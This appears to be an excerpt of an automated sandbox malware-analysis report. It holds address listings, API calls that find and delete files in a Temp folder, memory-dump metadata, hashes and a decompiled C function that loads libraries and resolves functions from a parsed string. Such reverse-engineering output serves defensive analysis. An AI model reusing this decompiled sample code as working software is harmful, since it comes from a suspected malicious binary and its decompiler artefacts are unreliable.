                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c91
                                                                                      0x00405c91
                                                                                      0x00405c93
                                                                                      0x00405db3
                                                                                      0x00405db5
                                                                                      0x00405db8
                                                                                      0x00405e09
                                                                                      0x00405e09
                                                                                      0x00405e09
                                                                                      0x00405dba
                                                                                      0x00405dbd
                                                                                      0x00405dc8
                                                                                      0x00405dcd
                                                                                      0x00405dcf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405dd2
                                                                                      0x00405dde
                                                                                      0x00405de3
                                                                                      0x00405de5
                                                                                      0x00000000
                                                                                      0x00405e00
                                                                                      0x00405de7
                                                                                      0x00405dea
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405def
                                                                                      0x00000000
                                                                                      0x00405df6
                                                                                      0x00405dbf
                                                                                      0x00405dbf
                                                                                      0x00000000
                                                                                      0x00405dbf
                                                                                      0x00405c99
                                                                                      0x00405c9c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c9c

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Borders.dat,\*.*), ref: 00405CBA
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                      • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Borders.dat$\*.*
                                                                                      • API String ID: 2035342205-804058615
                                                                                      • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                      • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                      • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                      • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 71031BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 95%
                                                                                      			E71031BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E710312BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E710312BB();
				_t321 = E710312E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E710313B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E7103162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x710323e8) & 0x000000ff) * 4 +  &M7103235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E710312CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E710312BB();
											 &_v12 = E71031B86( &_v12);
											__eax = E71031510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E71031B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E71031B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7103405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E71031B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E710316BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E710313B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E710316BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324); // executed
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E710313B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E710313B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E710313B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E710312CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E710313B1(_t90) * 4);
					goto L165;
				}
			}


































































                                                                                      0x71031c07
                                                                                      0x71031c0a
                                                                                      0x71031c0d
                                                                                      0x71031c10
                                                                                      0x71031c13
                                                                                      0x71031c16
                                                                                      0x71031c19
                                                                                      0x71031c1b
                                                                                      0x71031c1e
                                                                                      0x71031c21
                                                                                      0x71031c26
                                                                                      0x71031c29
                                                                                      0x71031c31
                                                                                      0x71031c39
                                                                                      0x71031c3b
                                                                                      0x71031c3e
                                                                                      0x71031c46
                                                                                      0x71031c46
                                                                                      0x71031c4b
                                                                                      0x71031c4e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031c5b
                                                                                      0x71031c60
                                                                                      0x71031c62
                                                                                      0x71031cf4
                                                                                      0x71031cf4
                                                                                      0x71031cf4
                                                                                      0x71031cf8
                                                                                      0x71031cfb
                                                                                      0x71031cfd
                                                                                      0x71031d1f
                                                                                      0x71031d21
                                                                                      0x71031d24
                                                                                      0x71031d2d
                                                                                      0x71031d33
                                                                                      0x71031d35
                                                                                      0x71031d3b
                                                                                      0x71031d3b
                                                                                      0x71031d41
                                                                                      0x71031d44
                                                                                      0x71031d44
                                                                                      0x71031d47
                                                                                      0x71031d47
                                                                                      0x71031d4d
                                                                                      0x71031d4f
                                                                                      0x71031d4f
                                                                                      0x71031d51
                                                                                      0x71031d54
                                                                                      0x71031d57
                                                                                      0x71031d5d
                                                                                      0x71031d63
                                                                                      0x71031d66
                                                                                      0x71031d8a
                                                                                      0x71031d8d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031d90
                                                                                      0x71031d92
                                                                                      0x71031da0
                                                                                      0x71031da3
                                                                                      0x71031da5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031da7
                                                                                      0x71031da7
                                                                                      0x71031da7
                                                                                      0x71031dad
                                                                                      0x71031daf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031db1
                                                                                      0x71031db3
                                                                                      0x71031db5
                                                                                      0x71031db7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031db7
                                                                                      0x71031db9
                                                                                      0x71031dbb
                                                                                      0x71031dbd
                                                                                      0x71031dbd
                                                                                      0x71031dc3
                                                                                      0x71031dc9
                                                                                      0x71031dcb
                                                                                      0x71031ddf
                                                                                      0x71031ddf
                                                                                      0x71031de1
                                                                                      0x71031dcd
                                                                                      0x71031dd3
                                                                                      0x71031dd6
                                                                                      0x71031dd6
                                                                                      0x00000000
                                                                                      0x71031d68
                                                                                      0x71031d68
                                                                                      0x71031d68
                                                                                      0x71031d69
                                                                                      0x71031d71
                                                                                      0x71031d75
                                                                                      0x71031d7b
                                                                                      0x71031d7f
                                                                                      0x00000000
                                                                                      0x71031d7f
                                                                                      0x71031d6b
                                                                                      0x71031d6b
                                                                                      0x71031d6c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031d6e
                                                                                      0x71031d6f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031d6f
                                                                                      0x71031cff
                                                                                      0x71031d00
                                                                                      0x71031d09
                                                                                      0x71031d0c
                                                                                      0x71031d19
                                                                                      0x71031d19
                                                                                      0x71031d0e
                                                                                      0x71031d0e
                                                                                      0x71031de7
                                                                                      0x71031dea
                                                                                      0x71031dee
                                                                                      0x71031e61
                                                                                      0x71031e65
                                                                                      0x71031c43
                                                                                      0x00000000
                                                                                      0x71031c43
                                                                                      0x00000000
                                                                                      0x71031e65
                                                                                      0x71031cfd
                                                                                      0x71031c68
                                                                                      0x71031c6b
                                                                                      0x71031cce
                                                                                      0x71031cd1
                                                                                      0x71031ce3
                                                                                      0x71031ce3
                                                                                      0x71031ce6
                                                                                      0x71031df3
                                                                                      0x71031df6
                                                                                      0x71031df6
                                                                                      0x71031df8
                                                                                      0x710321ae
                                                                                      0x710321c6
                                                                                      0x710321c6
                                                                                      0x710321c9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321b3
                                                                                      0x710321b4
                                                                                      0x710321b7
                                                                                      0x710321ba
                                                                                      0x71032244
                                                                                      0x7103224b
                                                                                      0x71032251
                                                                                      0x71032255
                                                                                      0x71031e5c
                                                                                      0x71031e5d
                                                                                      0x71031e5d
                                                                                      0x71031e5e
                                                                                      0x00000000
                                                                                      0x71031e5e
                                                                                      0x710321c0
                                                                                      0x710321c3
                                                                                      0x710321c3
                                                                                      0x710321cb
                                                                                      0x710321ce
                                                                                      0x71032238
                                                                                      0x71031e51
                                                                                      0x71031e54
                                                                                      0x71031e57
                                                                                      0x71031e5a
                                                                                      0x71031e5a
                                                                                      0x00000000
                                                                                      0x71031e5a
                                                                                      0x710321d0
                                                                                      0x710321d3
                                                                                      0x710321da
                                                                                      0x710321da
                                                                                      0x710321dd
                                                                                      0x710321e1
                                                                                      0x710321f5
                                                                                      0x710321f5
                                                                                      0x710321f8
                                                                                      0x710321fc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321fe
                                                                                      0x71032202
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032204
                                                                                      0x7103220b
                                                                                      0x7103220b
                                                                                      0x71032211
                                                                                      0x71032214
                                                                                      0x71032230
                                                                                      0x71032216
                                                                                      0x7103221f
                                                                                      0x71032222
                                                                                      0x71032222
                                                                                      0x00000000
                                                                                      0x71032214
                                                                                      0x710321e3
                                                                                      0x710321e6
                                                                                      0x710321ea
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321ec
                                                                                      0x00000000
                                                                                      0x710321ec
                                                                                      0x710321d5
                                                                                      0x710321d8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321d8
                                                                                      0x71031dfe
                                                                                      0x71031dfe
                                                                                      0x71031dff
                                                                                      0x71031f49
                                                                                      0x71031f49
                                                                                      0x71031f50
                                                                                      0x71031f53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f60
                                                                                      0x00000000
                                                                                      0x7103214b
                                                                                      0x7103214e
                                                                                      0x71032151
                                                                                      0x71032151
                                                                                      0x71032152
                                                                                      0x71032153
                                                                                      0x71032156
                                                                                      0x71032159
                                                                                      0x7103215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103215e
                                                                                      0x7103215e
                                                                                      0x71032162
                                                                                      0x7103217a
                                                                                      0x7103217d
                                                                                      0x71032181
                                                                                      0x71032187
                                                                                      0x00000000
                                                                                      0x71032187
                                                                                      0x71032164
                                                                                      0x71032164
                                                                                      0x71032167
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032169
                                                                                      0x7103216c
                                                                                      0x7103216e
                                                                                      0x7103216f
